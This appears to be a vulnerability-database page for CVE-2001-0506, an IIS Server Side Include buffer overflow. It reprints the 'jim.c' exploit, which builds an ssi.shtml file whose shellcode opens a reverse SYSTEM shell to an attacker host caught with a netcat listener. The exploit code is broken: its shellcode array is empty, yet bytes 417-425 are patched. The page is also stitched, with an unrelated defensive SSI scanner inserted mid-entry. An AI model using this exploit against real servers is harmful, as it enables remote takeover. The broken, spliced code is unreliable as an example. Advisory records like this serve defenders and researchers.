IIS ssinc.dll Buffer Overflow Vulnerability


Vulnerability ID: 1106466
Vulnerability type: Buffer overflow
Published: 2001-08-15
Updated: 2005-10-12
CVE ID: CVE-2001-0506
CNNVD-ID: CNNVD-200109-088
Platform: Windows
CVSS score: 7.2
|Vulnerability Source
https://www.exploit-db.com/exploits/21071
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-088
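|Vulnerability Details
ssinc.dll in IIS 5.0 and 4.0 contains a buffer overflow vulnerability. A local user can escalate to system privileges by means of a Server-Side Includes (SSI) directive with an overly long file name. The overflow is triggered when the file name is added; the issue is also known as the "SSI privilege elevation" vulnerability.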
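A defender-side check for the condition described above, as an added example that is not part of the original page or of any vendor tooling: it scans the content of a web-root file for SSI include directives whose quoted name is overlong, unterminated, or contains non-printable bytes. The function names and the 260-byte limit (Windows MAX_PATH) are assumptions, not values from the advisory.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define SSI_MAX_NAME 260 /* assumed limit (Windows MAX_PATH); not from the advisory */

/* Case-insensitive match of a lowercase ASCII keyword at p, bounded by end. */
static int starts_with(const unsigned char *p, const unsigned char *end, const char *kw)
{
    for (; *kw; kw++, p++)
        if (p >= end || tolower(*p) != *kw)
            return 0;
    return 1;
}

/*
 * Count <!--#include file="..."--> (or virtual="...") directives whose quoted
 * name is overlong, unterminated, or holds bytes outside printable ASCII.
 * buf may contain NULs and need not be NUL-terminated.
 */
int count_suspicious_ssi_includes(const unsigned char *buf, size_t len)
{
    const unsigned char *end = buf + len;
    int hits = 0;

    for (const unsigned char *p = buf; p < end; p++) {
        if (!starts_with(p, end, "<!--"))
            continue;
        const unsigned char *s = p + 4;
        while (s < end && isspace(*s))   /* also accept "<!-- #include" */
            s++;
        if (!starts_with(s, end, "#include"))
            continue;
        const unsigned char *q = memchr(s, '"', (size_t)(end - s));
        if (q == NULL)
            break;                       /* directive without a quoted name */
        size_t n = 0;
        int bad = 0;
        for (q++; q + n < end && q[n] != '"'; n++)
            if (q[n] < 0x20 || q[n] > 0x7e)
                bad = 1;                 /* binary data where a path belongs */
        if (q + n == end || n > SSI_MAX_NAME)
            bad = 1;                     /* unterminated or overlong name */
        hits += bad;
        if (q + n == end)
            break;
        p = q + n;                       /* resume after the closing quote */
    }
    return hits;
}
```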
|Exploit
source: http://www.securityfocus.com/bid/3190/info

A vulnerability exists in Microsoft IIS 4.0 and 5.0 that could allow a user with permission to write content to the IIS server to run any code in Local System context.

/*	jim.c - IIS Server Side Include exploit by
Indigo <[email protected]> 2001

	Usage: jim <attacker host> <attacker port>

	This code has been compiled and tested
on Linux and Win32

	To exploit this vulnerability you must have
write access to the web root of the
	target web server. This program will
generate a file called ssi.shtml.
	Create a directory in the web root whose
name is 12 characters long (this is important!)
	eg. ssi_overflow then put this file into the
new directory. Start up a netcat listener:

	nc -l -p <attacker port> -vv

    	Access the file
http://target/ssi_overflow/ssi.shtml using a web
browser.
	N.B. I have had problems using Netscape
to do this but IE works fine.

	A SYSTEM shell will appear in the Netcat
session.

	You may need to hit return a few times to
get the prompt up.

	Main shellcode adapted from jill.c by dark
spyrit <[email protected]>

	Greets to:

	Morphsta, Br00t, Macavity, Jacob &
Monkfish...Not forgetting D-Niderlunds
*/

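#include <stdio.h>
#include <stdlib.h>     /* atoi */
#include <arpa/inet.h>  /* htons, inet_addr (POSIX; omit when compiling on Win32) */
/* #include <windows.h> uncomment if compiling on Win32 */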

int main(int argc, char *argv[])
{

unsigned char shellcode[] =

"";	/* encoded payload bytes omitted; the offsets patched below index into the original array */

FILE *fp;
unsigned short int      a_port;
unsigned long           a_host;

printf ("\njim - IIS Server Side Include overflow launcher\nby Indigo <[email protected]> 2001\n\n");

printf ("To exploit this vulnerability you must have write access\n");
printf ("to the web root of the target web server.\n\n");
printf ("This program will generate a file called ssi.shtml.\n");
printf ("Create a directory in the web root whose name is\n");
printf ("12 characters long eg. ssi_overflow then put this file\n");
printf ("into the new directory. Start up a netcat listener:\n\n");
printf ("nc -l -p <attacker port> -vv\n\n");
printf ("Access the file http://target/ssi_overflow/ssi.shtml\n");
printf ("using a web browser. A SYSTEM shell will appear.\n\n");
printf ("N.B. I have had problems using Netscape to do this but IE works fine.\n\n");

if (argc != 3)
{
	printf ("Usage: %s <attacker host> <attacker port>\n", argv[0]);
	return (1);
}

/* port and host are converted to network byte order, then each byte is XORed with 0x95 */
a_port = htons(atoi(argv[2]));
a_port^= 0x9595;

a_host = inet_addr(argv[1]);
a_host^=0x95959595;

/* patch the encoded port and host into the array at fixed offsets */
shellcode[417]= (a_port) & 0xff;
shellcode[418]= (a_port >> 8) & 0xff;

shellcode[422]= (a_host) & 0xff;
shellcode[423]= (a_host >> 8) & 0xff;
shellcode[424]= (a_host >> 16) & 0xff;
shellcode[425]= (a_host >> 24) & 0xff;

fp = fopen ("./ssi.shtml","wb");
if (fp == NULL)
{
	perror ("ssi.shtml");
	return (1);
}

fputs ((char *)shellcode,fp);

fclose (fp);

return 0;

}
|References

Source: BID
Name: 3190
Link: http://www.securityfocus.com/bid/3190
Source: MS
Name: MS01-044
Link: http://www.microsoft.com/technet/security/bulletin/ms01-044.asp
Source: XF
Name: iis-ssi-directive-bo(6984)
Link: http://xforce.iss.net/static/6984.php
Source: CIAC
Name: L-132
Link: http://www.ciac.org/ciac/bulletins/l-132.shtml
Source: BUGTRAQ
Name: 20011127 IIS Server Side Include Buffer overflow exploit code
Link: http://online.securityfocus.com/archive/1/242541
Source: BUGTRAQ
Name: 20010817 NSFOCUS SA2001-06: Microsoft IIS ssinc.dll Buffer Overflow Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=99802093532233&w=2
